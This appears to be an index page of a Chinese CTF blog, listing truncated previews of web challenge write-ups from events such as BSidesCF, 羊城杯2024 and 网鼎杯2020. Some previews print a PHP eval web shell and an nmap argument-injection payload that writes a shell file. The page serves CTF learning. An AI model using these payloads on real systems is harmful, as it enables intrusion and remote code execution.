-
BSidesCF2019
[BSidesCF 2019]Futurella查看源代码 [BSidesCF 2019]Kookie发现登录不成功 123456789101112Request:GET /?action=login HTTP/1.1Host: 38026284-ee1c-468a-a556-b4b1091c3946.node5.buuoj.cn:81Cache-Control: max-age=0Upgr... -
WUSTCTF2020
[WUSTCTF2020]朴实无华先进行目录扫描 /robots.txt 1234User-agent: *Disallow: /fAke_f1agggg.php抓包发现/fl4g.php 123456789101112131415161718192021222324252627282930313233343536373839404142<?phpheader('Conte... -
NepCTF2024
又学了一些
-
羊城杯2024
0x01 前言这几天比赛是不断的,虽然我输出少,但是咱还是得参与啊 0x02 questionLyrics For You扫描出来有两个路由/board和login,同时观察url,可能存在目录穿越 直接读取flag,失败发现可以载入代码在board,尝试载入小马 1<script language='php'>@eval($_POST[1]);</sc... -
[NewStarCTF 公开赛赛道]SSTI
SSTI部分
-
DASCTF2024八月
第一次DAS能通
-
GWCTF2019
打比赛打不过那就来浮现一个
-
安洵杯2019
[安洵杯 2019]easy_serialize_php12345678910111213141516171819202122232425262728293031323334353637383940<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('... -
网鼎杯2020朱雀组
[网鼎杯 2020 朱雀组]Think Javajava代审 [网鼎杯 2020 朱雀组]Nmap12nmap -oG 写入文件 nmap -iL读取扫描文件 黑盒但是随便测测应该就可以绕过了 12345678127.0.0.1'<?=eval($_POST[a]);?> -oG shell.php'Hacker...127.0.0.1'<?... -
bsidescf2020
[BSidesCF 2020]Bulls23先搞下来,解压发现是个html 本地搞个html网页来加载发现可以登录 发现第一个链接就是 1http://bash.org/?random 找到是websocket流量 发现第二个链接 1http://n-gate.com 中途发现端口是8888 但还是不懂,说的要追踪TCP流量,那就追踪 1tcp.stream eq 363 然后随便选一...